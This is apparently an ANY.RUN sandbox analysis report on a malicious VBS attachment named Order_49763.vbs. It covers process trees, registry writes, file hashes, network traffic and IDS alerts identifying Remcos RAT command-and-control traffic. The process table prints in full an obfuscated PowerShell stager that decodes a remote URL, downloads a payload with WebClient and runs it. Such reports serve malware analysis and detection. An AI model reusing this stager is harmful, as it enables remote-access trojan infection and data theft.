| File name: | Order_49763.vbs |
| Full analysis: | https://app.any.run/tasks/0fa20886-880d-4d3b-b0cb-cc62d6910938 |
| Verdict: | Malicious activity |
| Threats: | Remote access trojans (RATs) are a type of malware that enables attackers to establish complete to partial control over infected computers. Such malicious programs often have a modular design, offering a wide range of functionalities for conducting illicit activities on compromised systems. Some of the most common features of RATs include access to the users’ data, webcam, and keystrokes. This malware is often distributed through phishing emails and links. |
| Analysis date: | June 05, 2025, 06:33:18 |
| OS: | Windows 10 Professional (build: 19044, 64 bit) |
| Tags: | |
| Indicators: | |
| MIME: | text/plain |
| File info: | ASCII text, with CRLF line terminators |
| MD5: | 39E8D4BE76AABF8314D7891F7547DDE0 |
| SHA1: | CC6E764237BF4559365FB9A651E451D6D65EF1E6 |
| SHA256: | DC8A7B7AA888342FBE510AF7016F9BD0048C5271112B25149A7657E5E4490F72 |
| SSDEEP: | 384:7S91QMDDu4TUPTZ+b6zdVgCBVpGJppfVFUVmb7bhHujmyRh5VRm8SHTzH:7C1re40BznfXpGvp/UseRfm8gXH |
PID | CMD | Path | Indicators | Parent process | |||||||||||
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
| 660 | \??\C:\WINDOWS\system32\conhost.exe 0xffffffff -ForceV1 | C:\Windows\System32\conhost.exe | — | powershell.exe | |||||||||||
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Console Window Host Exit code: 0 Version: 10.0.19041.1 (WinBuild.160101.0800) Modules
| |||||||||||||||
| 1512 | "C:\WINDOWS\System32\SLUI.exe" RuleId=3482d82e-ca2c-4e1f-8864-da0267b484b2;Action=AutoActivate;AppId=55c92734-d682-4d71-983e-d6ec3f16059f;SkuId=4de7cb65-cdf1-4de9-8ae8-e3cce27b9f2c;NotificationInterval=1440;Trigger=TimerEvent | C:\Windows\System32\slui.exe | SppExtComObj.Exe | ||||||||||||
User: NETWORK SERVICE Company: Microsoft Corporation Integrity Level: SYSTEM Description: Windows Activation Client Version: 10.0.19041.1 (WinBuild.160101.0800) Modules
| |||||||||||||||
| 2196 | C:\WINDOWS\system32\svchost.exe -k NetworkService -p -s Dnscache | C:\Windows\System32\svchost.exe | services.exe | ||||||||||||
User: NETWORK SERVICE Company: Microsoft Corporation Integrity Level: SYSTEM Description: Host Process for Windows Services Version: 10.0.19041.1 (WinBuild.160101.0800) Modules
| |||||||||||||||
| 2600 | "C:\WINDOWS\System32\WScript.exe" C:\Users\admin\AppData\Local\Temp\Order_49763.vbs | C:\Windows\System32\wscript.exe | — | explorer.exe | |||||||||||
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Microsoft ® Windows Based Script Host Exit code: 0 Version: 5.812.10240.16384 Modules
| |||||||||||||||
| 5236 | "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "Get-counter;Get-Service;$krohold='A'+ [char]58;Get-hotfix;$Conferential=(gcm $krohold).CommandType;$Conferential=[String]$Conferential;$riflens='Talemonger';$Conferential+=':';(ne`w-item -p $Conferential -n Involvers -value { param ($Pervader);$riflens='Paataleberettigede';$Transplantar=6;$Tidsindikator='Intersessional';do {$Helbredsgrunds+=$Pervader[$Transplantar];$Transplantar+=7} until(!$Pervader[$Transplantar])$Helbredsgrunds});(ne`w-item -p $Conferential -n Brists -value {param ($Sawfish98);.($Deairs183) ($Sawfish98)});ConvertTo-Html;$Skaaltalers=Involvers ' stormn Dial EB rrelTR serv.Titan w';$Skaaltalers+=Involvers ' SelskeFis.elBChondrcReaktiLS.eaksiSlvvrdeHanernnForge T';$Kodestrenge=Involvers ' BarbeMPre,ccoPladdez CytoaiNyligslGr,psal M.shraPrecar/';$Personam=Involvers ' Su fbTHaar.olPrintesAdrtun1Kinest2';$Heloises=' fsand[BillioNLegatbeTwinjetbor en.NoncatsManddaeS eetfrFolketvUddanniKaolincTa dfyEUndevepKlkkelOServanIRedninnAdderiTTilflymS,latta YieldNS.lphuAReco tGKllingE UnnatrDannel]H stoz: Quadl:AmbitisAphorie AdenoCMesentU VaandrMomsnvIHelgenTOveralYOdiserPHockdarUnsensO NeuroTOrledeO.ittercPerpleOCreedelBreckt=Lavali$Svrt dp Unwo EUdtvrer.kyllesFejlproPh.siknBortslaFormaaM';$Kodestrenge+=Involvers 'Unpast5 overs.Palvin0Stamin Bumpie(Pill sWGrafikiU inqunV,rbosdUnnod oTartlew List.sM nett Fla woN PanteT,adelk Pane,1 umbag0Sexolo.Gossip0Trisac;outvil Sg menWRele eiDrapernDibhol6Pregui4Re ion;Greyho Twel xLarree6Disili4Diah l;Dagdr ReemitrPalaeovQuaffe: Mo,bi1Seasho3Toggin7De lut.ta,vrd0 Urugu),ockne UniveGHyperde FlorscSmageakFamilio Ekspo/afterd2Digres0 ntib1Script0Dirked0Datala1B dget0Trykfd1Soiree TandhjFBobbiniSandhirHankereKlyderfOmnineoMarmorxImping/ rdrem1Sazera3Falk t7R vanc.Bi led0';$Anpartsselskabets=Involvers 'Bandidu UnepisDestruE maabrRUnreme-Lyeth.A totalGDiscjoERetrorNDys rgt';$plowboys=Involvers 'UncomphUnperftGidseltDefilapModstosS roph:Unhy h/indust/Inti,ifSchoolaNonph mSor smipauserlGriefryMankiet onarah Tja seRegdlurvallieaReliktpRatalfyPatr sc P,iloe,inussnDokumetJernbaeUnparerB,relr.Polymir Steves fterl/DalboeP MordeeDrift rsadness T,matodigox.nAt.ernlOutwiniAktuelgknivsthBogsi eIndgi d Capess SeniosproteopparlouaTriad,l SletntBlotlgnProkuriMagisnnStjer.gSkudlie RobotrPaatry. ultipa Sou,fsBrnefoi';$Ophiosaurus=Involvers 'Autoge>';$Deairs183=Involvers 'Vestpai To.tueDesertx';$Termodynamiske='Railed';$Adresseforskydningers='\Supervalue.Nod';Brists (Involvers ' ntrod$YartheGDiss,nl t.afiO.dgangb Ka noaFravegl Resis: BedesmUnlam EBegunstotopatounsleaD.ondedialo eksPersonMascendEReauth=Inv ib$Outm.nE KonkuNBaniyaVAthlet:TilflyaSpaghepKemot pAvisnddTan.spANonadhTLicentALoofne+ Sprog$GrnsevA VinegDTravlerCybercEIndonesElastiSarbejdE ArctiF Spl toBankakrSo.negs Ge.gaK FjordyCurso DMenustNHumoroiSyb rinBroling sflagEDonsy rVistots');Brists (Involvers ' Fem e$ ntikig ,ilocLUsmageOScalpebHyperiAHorizolCallee:R figntComputrBrocheuUlvensSRiotistfrike ETva.gsEBrnshj=K,rafl$ Voc fP Reop LRentetoAkut.fW FenesBBnkhagoHemaggYPorte SIgu no.EnlighsellipspUnevitL BoweriDistenTSeptik(b vids$ .nmrko HalvcpIntegrHRi zinIBond oo Derivs EntreaIltstyuSvimleR hawbauPolitiSCrayle)');Brists (Involvers $Heloises);$plowboys=$Trustee[0];$Lancepod=(Involvers 'unhy n$Press.GIncamelDehumiOBowldeBRhyobaaEchinoLPhytol: orvalDInversAKalvniNCondidBDrifteU HybrirtsermayKitnin=UninciNskinpre.aletuWHovmes-UndersOSleeveBKunstsJStupideWoolh c LycidtGonoph Rurit,s Opgany N gleSSprkk,TSuperbEBeclammSomato.amara $Nurleds GyldikFodsidaBiblioa ParafL CargatGrenecaNokbndlAphakieAgerkoRTravkus');Brists ($Lancepod);Brists (Involvers ' Po am$ne hroDTilbagaAktoranPrograbSolderu Gl corVord ny ostis. UnproHVr,gene Mus kaForbindEisenbeForfatrVindsts Natio[Isenkr$ De laABrndeknPilledp krmstaLkkencrRati,itLoffeusKalendsEibr teJugosll FranksKid apkA tjena Abs rbTasseleversiftSororasSmir.h]U bloo= Fla q$ magt KSmaaovoB neprd HexobeRals,osTvillitba busr,umsereUnwarbn DossigBrontoe');$Becomed=Involvers 'ObligaDBogbino abbvrw .rresn Reexpl Fej ro reeliau fanadCodifyFr,prodiC romalMnttele';$Haendt=Involvers ' Tyrke$KilimsDRubidiaDansesnK onerb ellemu.onarrrSil,ieyTagkam.Giddyu$ Tag,oBAgglutePalaiscDispono pindemUnmanieChar,ed Kardi.ProasfIQuina nOpknapv,nsepaoRetninkCountdeAverme( Lager$Ne,fibp DecollBlikdaoSkydelwHyp.enb SpilloharbifySemipisOnuses,Wingha$BreddeS BalletSubenteWeaselnPrem dgTyn.sluSkuffen I,itieEclairnMa,giteKvalitsFiber,)';$Stengunenes=$Metodisme;Brists (Involvers 'Brumme$BlodprgL.vslglOverliO D.famBMigratACastanLTellur:Skv,drb ImpawO PogroZStje noSygehuSEndomi=Buklen(Elve nT PromiEsmoothsBaisemTCa roc-As.araPWeemhaAleafcutRe rygHMtxout Vennep$Skovsys TelluTAftegnET dsatnFlyvegG AfblauMicrocNKernekeUlceraN.ntermEUnprossSodfar)');while (!$Bozos) {Brists (Involvers 'Puljer$Fla.lig FeathlInscr oRigoribD,rtidaTom esl Tomme:kerchubEtnogrr BaymeaGenhusmdistom=Out ri$HrelreSKle mepTu tenoHexosad Inveri odefiu Skiffm') ;Brists $Haendt;Brists (Involvers 'Tilb.i[ vanddTOprejsHNordlyrProscrESukkerA .odgeDS,vjediPhotojNLegendgJunkin.Whitert OmlssHVarskoRSobereePolerea egradYetzer]Pros,a:angina: Biobrs ntercl AmenteAffa.lE oinonPke.ser(Furmen4Trvlss0Ferrob0 sthes0Mngdel)');Brists (Involvers 'Op.ygg$MoraliGFodsvalnornaiOpjankeB .ankba etaiLSpiral:SliknebVictroOHonoraZStupr oGal insS mple=Behov.(Amillat obmasEMilitasU vouctImmeth-BrushiP Ov,rmaH.ktorTPlir pHProfi. Waggon$PartisSPeric.TTungesEcephalNV nstrGTiaspeuNonrabnCoolhee Nat oN UnlabeDosissSR tfrd)') ;Brists (Involvers 'Bushig$Scep rgF afrtlKon efoAm rtibCon idaGammelL Dybs : PaaliG JouncETarragSkundektPerisoiEvaporkLowmosUinformLN minaAAssurit cho.riForespOHidr.enArchae= Dem l$Om yttgAtteneLForespO ChankbStfronaAccompLProper:FluoreiSkole.s StenkOGlammepNobelpEIndfarnfuturiTRectotyCorreoL avtln+Ejakul+N.nsys%,evera$SituatT DrizzrFujitsu ,ovsaSGentletStrixdEFairf,ECcdrel. orhaacp,astpo ShiteuUnwaivNMalignt') ;$plowboys=$Trustee[$Gestikulation]}$Registertilsynets=362732;$Bevbner=32451;Brists (Involvers 'madr l$SaleraGformsslDanablOo erasbKompo aDeposaLCroomi:KvalitsRabandTB esluRAdgange UdbryGIncatenJet.isi ursusnSeedbegToboggeGo kenRHalchbNanomiaeModst S,lsej=Virkso FerielG No vieBryg eTSvi eb-N nopiCFlsommO profeNN.nsevtEusteleImplemnGing lTPampan Flyv h$ Smalls SkvadT P ramePhilosNcykel.GDivo,cuSpe,dbnUraeuseNigerin a terECaupo,S');Brists (Involvers 'D mini$ pugergAfrikalSl veloNathanbKjeninaSvinellB.kkes:FlaadeKTr chouCaabasrS marisFla ghnBu.teheAfhjlpdwhizzps R ssok Eloq rNomi eiT sindvFlebilnUncoveiCreatunStemm g loriceHjlpekrKejsernSkimpieAcanth Upaali= Konge Indvik[AncienSStvl,syBrugsfsNati,nt,replaeBearwomSuperu.UndercCRmensdo tilfrnBullhevAalndieStrumor Mithrtamaslr]Skaarl: Cr ne: ProhuFEksamerAphis,oGrundfmSuda iBL posta ereawsUrocereGa,ell6Saltsy4ScatheS olorltIatromrBrofagidiscornRedoubgAdmitt(Belaan$UnpermSS bclatEks rcrtappere agbrkgSikkern Acid.iGuav,nnStart,gtilbageFnidderSejlsknBaisseeLyknsk)');Brists (Involvers 'Overac$ assivGKnsforlAfg ftO FastebKaalsta An lyLtypega:Parafefsnjasnr,ansioAS taniGStan ni MorskK,tilpek Br nkewinaduSB eech Insurg=Slotsf Retske[ShibboSCuddl.yafg.anSblatenT eklaeSenegamSaddel. WhitetProporEBi.kemxStam etarmods. Underebeefien PhotocKerne O okfrodGenansistrickN HutukGKogeni]Po tie:Begreb: Ves.eAThan ts GenskCEle.abI istodIMilkne.Leukocg rakioetakistTE oders BasisTmetam RFri.tiIHe dstNPublisgSubcon(Agatho$ UmbelkSa risuKva ifR ejplasHalverNVsnetsE Kra.bd KarnasForhaaKMngdetrSkaberi oncliVOffshonSjlekviTer asnConditgdobbelEKvi.alRUhensin letfiEKnarr )');Brists (Involvers 'So fal$TmrerngUnhortLEncr.nO ngrambLig.alA AzonaLPho,og: Nobi aCe emoGWindsunForkamOAbortimResectEHypoganPhot msStofmi=Lderv $S ruggfZerklarOpkaldaMiljingKongrei LnsatkPledkaKOrd lleV,tiliSd tter.,vetydsProflauLinikaB Delfis.exbomtFinin rDila,iiTrfiskNCa oubg Leewa(Automa$T,ntatrBlockbESadelmG ImperIF rinosTryghetHackbueSodavarUdkrngt Pret.I Hologl UnsetS HaspeY .ristN filteEProfesTTestamS Okses,Quiz,a$Nis erbAfglatEComburVHk aksbKon ernHandsoeTruppeRSvalin)');Brists $Agnomens;" | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | wscript.exe | ||||||||||||
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows PowerShell Exit code: 0 Version: 10.0.19041.1 (WinBuild.160101.0800) Modules
| |||||||||||||||
| 5556 | "C:\WINDOWS\SysWOW64\msiexec.exe" | C:\Windows\SysWOW64\msiexec.exe | powershell.exe | ||||||||||||
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows® installer Version: 5.0.19041.3636 (WinBuild.160101.0800) Modules
| |||||||||||||||
| 5720 | C:\WINDOWS\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.19041.3989_none_7ddb45627cb30e03\TiWorker.exe -Embedding | C:\Windows\WinSxS\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.19041.3989_none_7ddb45627cb30e03\TiWorker.exe | — | svchost.exe | |||||||||||
User: SYSTEM Company: Microsoft Corporation Integrity Level: SYSTEM Description: Windows Modules Installer Worker Version: 10.0.19041.3989 (WinBuild.160101.0800) Modules
| |||||||||||||||
| 6044 | \??\C:\WINDOWS\system32\conhost.exe 0xffffffff -ForceV1 | C:\Windows\System32\conhost.exe | — | cmd.exe | |||||||||||
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Console Window Host Exit code: 0 Version: 10.0.19041.1 (WinBuild.160101.0800) Modules
| |||||||||||||||
| 6048 | "C:\Windows\System32\cmd.exe" /c ping 127.0.0.1 | C:\Windows\System32\cmd.exe | — | wscript.exe | |||||||||||
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows Command Processor Exit code: 0 Version: 10.0.19041.1 (WinBuild.160101.0800) Modules
| |||||||||||||||
| 6476 | ping 127.0.0.1 | C:\Windows\System32\PING.EXE | — | cmd.exe | |||||||||||
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: TCP/IP Ping Command Exit code: 0 Version: 10.0.19041.1 (WinBuild.160101.0800) Modules
| |||||||||||||||
| (PID) Process: | (5720) TiWorker.exe | Key: | HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Component Based Servicing |
| Operation: | write | Name: | SessionIdHigh |
Value: 31184355 | |||
| (PID) Process: | (5720) TiWorker.exe | Key: | HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Component Based Servicing |
| Operation: | write | Name: | SessionIdLow |
Value: | |||
| (PID) Process: | (5556) msiexec.exe | Key: | HKEY_CURRENT_USER\SOFTWARE\Rmc-AV3423 |
| Operation: | write | Name: | exepath |
Value: D918CFA58E5D5580D9FBAF00A8A3F40E87AFA6176B04382213F5D30200AE2FCFBCDC1EFE1248D7B69A519EF6428B90C0EF2617C0B1E4CEA2EA2FFBDB91A17A56 | |||
| (PID) Process: | (5556) msiexec.exe | Key: | HKEY_CURRENT_USER\SOFTWARE\Rmc-AV3423 |
| Operation: | write | Name: | licence |
Value: 91CACB065A3987C37275CBA558F3D020 | |||
| (PID) Process: | (5556) msiexec.exe | Key: | HKEY_CURRENT_USER\SOFTWARE\Rmc-AV3423 |
| Operation: | write | Name: | time |
Value: | |||
| (PID) Process: | (5556) msiexec.exe | Key: | HKEY_CURRENT_USER\SOFTWARE\Rmc-AV3423 |
| Operation: | write | Name: | UID |
Value: | |||
| (PID) Process: | (5556) msiexec.exe | Key: | HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Content |
| Operation: | write | Name: | CachePrefix |
Value: | |||
| (PID) Process: | (5556) msiexec.exe | Key: | HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Cookies |
| Operation: | write | Name: | CachePrefix |
Value: Cookie: | |||
| (PID) Process: | (5556) msiexec.exe | Key: | HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\History |
| Operation: | write | Name: | CachePrefix |
Value: Visited: | |||
PID | Process | Filename | Type | |
|---|---|---|---|---|
| 7856 | powershell.exe | C:\Users\admin\AppData\Local\Temp\__PSScriptPolicyTest_3voccuz2.oci.ps1 | text | |
MD5:D17FE0A3F47BE24A6453E9EF58C94641 | SHA256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7 | |||
| 5556 | msiexec.exe | C:\Users\admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\103621DE9CD5414CC2538780B4B75751 | der | |
MD5:E192462F281446B5D1500D474FBACC4B | SHA256:F1BA9F1B63C447682EBF9DE956D0DA2A027B1B779ABEF9522D347D3479139A60 | |||
| 7856 | powershell.exe | C:\Users\admin\AppData\Local\Temp\__PSScriptPolicyTest_v5vft1qt.uux.psm1 | text | |
MD5:D17FE0A3F47BE24A6453E9EF58C94641 | SHA256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7 | |||
| 5720 | TiWorker.exe | C:\Windows\Logs\CBS\CBS.log | text | |
MD5:DD07E1F65BFB38C2BC717A30775EBB77 | SHA256:51EE1E56F2DCA96357D644EF85B90C675E57618D33229BC052184E9508984EDA | |||
| 5236 | powershell.exe | C:\Users\admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive | binary | |
MD5:075C69EB6D23CCE0BDA5C250B52DDD35 | SHA256:098DE25CF84966474048EF7FD9C3BCF9B9A9B50478007F59B93579A19352CCEF | |||
| 5236 | powershell.exe | C:\Users\admin\AppData\Local\Temp\__PSScriptPolicyTest_rgulrabu.5bw.psm1 | text | |
MD5:D17FE0A3F47BE24A6453E9EF58C94641 | SHA256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7 | |||
| 5236 | powershell.exe | C:\Users\admin\AppData\Roaming\Supervalue.Nod | text | |
MD5:4C2D71257514D99BFBC971BADA091CC5 | SHA256:7DEEF2590A6B7E87F688D3657793B611814D6983D33E0C0E1E3E34E3CCBDBE10 | |||
| 5236 | powershell.exe | C:\Users\admin\AppData\Local\Temp\__PSScriptPolicyTest_ejisiyqq.4yy.ps1 | text | |
MD5:D17FE0A3F47BE24A6453E9EF58C94641 | SHA256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7 | |||
| 5556 | msiexec.exe | C:\Users\admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\103621DE9CD5414CC2538780B4B75751 | binary | |
MD5:18DD4C20EB878B615188FA8F9BC9F1DD | SHA256:48A2035C2ED67002A8278568FEC2A02B6E03668E551BB0435E76B626DFBDFEB4 | |||
| 7856 | powershell.exe | C:\Users\admin\AppData\Local\Temp\__PSScriptPolicyTest_1hogeuop.jiq.ps1 | text | |
MD5:D17FE0A3F47BE24A6453E9EF58C94641 | SHA256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7 | |||
PID | Process | Method | HTTP Code | IP | URL | CN | Type | Size | Reputation |
|---|---|---|---|---|---|---|---|---|---|
5496 | MoUsoCoreWorker.exe | GET | 200 | 2.20.245.139:80 | http://crl.microsoft.com/pki/crl/products/MicRooCerAut2011_2011_03_22.crl | unknown | — | — | whitelisted |
5496 | MoUsoCoreWorker.exe | GET | 200 | 2.23.181.156:80 | http://www.microsoft.com/pkiops/crl/MicSecSerCA2011_2011-10-18.crl | unknown | — | — | whitelisted |
5576 | SIHClient.exe | GET | 200 | 23.219.150.101:80 | http://www.microsoft.com/pkiops/crl/Microsoft%20ECC%20Product%20Root%20Certificate%20Authority%202018.crl | unknown | — | — | whitelisted |
5576 | SIHClient.exe | GET | 200 | 23.219.150.101:80 | http://www.microsoft.com/pkiops/crl/Microsoft%20ECC%20Update%20Secure%20Server%20CA%202.1.crl | unknown | — | — | whitelisted |
6544 | svchost.exe | GET | 200 | 2.23.77.188:80 | http://ocsp.digicert.com/MFEwTzBNMEswSTAJBgUrDgMCGgUABBSAUQYBMq2awn1Rh6Doh%2FsBYgFV7gQUA95QNVbRTLtm8KPiGxvDl7I90VUCEAJ0LqoXyo4hxxe7H%2Fz9DKA%3D | unknown | — | — | whitelisted |
5556 | msiexec.exe | GET | 200 | 65.9.66.96:80 | http://r11.c.lencr.org/69.crl | unknown | — | — | whitelisted |
5556 | msiexec.exe | GET | 200 | 2.23.197.184:80 | http://x1.c.lencr.org/ | unknown | — | — | whitelisted |
5556 | msiexec.exe | GET | 200 | 178.237.33.50:80 | http://geoplugin.net/json.gp | unknown | — | — | whitelisted |
PID | Process | IP | Domain | ASN | CN | Reputation |
|---|---|---|---|---|---|---|
4616 | RUXIMICS.exe | 4.231.128.59:443 | — | MICROSOFT-CORP-MSN-AS-BLOCK | IE | whitelisted |
4 | System | 192.168.100.255:137 | — | — | — | whitelisted |
— | — | 4.231.128.59:443 | — | MICROSOFT-CORP-MSN-AS-BLOCK | IE | whitelisted |
5408 | svchost.exe | 4.231.128.59:443 | — | MICROSOFT-CORP-MSN-AS-BLOCK | IE | whitelisted |
5496 | MoUsoCoreWorker.exe | 2.20.245.139:80 | crl.microsoft.com | Akamai International B.V. | SE | whitelisted |
5496 | MoUsoCoreWorker.exe | 2.23.181.156:80 | www.microsoft.com | AKAMAI-AS | DE | whitelisted |
5496 | MoUsoCoreWorker.exe | 4.231.128.59:443 | — | MICROSOFT-CORP-MSN-AS-BLOCK | IE | whitelisted |
2112 | svchost.exe | 4.231.128.59:443 | — | MICROSOFT-CORP-MSN-AS-BLOCK | IE | whitelisted |
4 | System | 192.168.100.255:138 | — | — | — | whitelisted |
5408 | svchost.exe | 40.127.240.158:443 | settings-win.data.microsoft.com | MICROSOFT-CORP-MSN-AS-BLOCK | IE | whitelisted |
Domain | IP | Reputation |
|---|---|---|
google.com |
| whitelisted |
crl.microsoft.com |
| whitelisted |
www.microsoft.com |
| whitelisted |
settings-win.data.microsoft.com |
| whitelisted |
familytherapycenter.rs |
| unknown |
login.live.com |
| whitelisted |
ocsp.digicert.com |
| whitelisted |
client.wns.windows.com |
| whitelisted |
slscr.update.microsoft.com |
| whitelisted |
fe3cr.delivery.mp.microsoft.com |
| whitelisted |
PID | Process | Class | Message |
|---|---|---|---|
2196 | svchost.exe | Potentially Bad Traffic | ET DYN_DNS DYNAMIC_DNS Query to a *.duckdns .org Domain |
2196 | svchost.exe | Misc activity | ET DYN_DNS DYNAMIC_DNS Query to *.duckdns. Domain |
5556 | msiexec.exe | A Network Trojan was detected | REMOTE [ANY.RUN] REMCOS TLS Connection JA3 Hash |
5556 | msiexec.exe | Malware Command and Control Activity Detected | ET JA3 Hash - Remcos 3.x/4.x TLS Connection |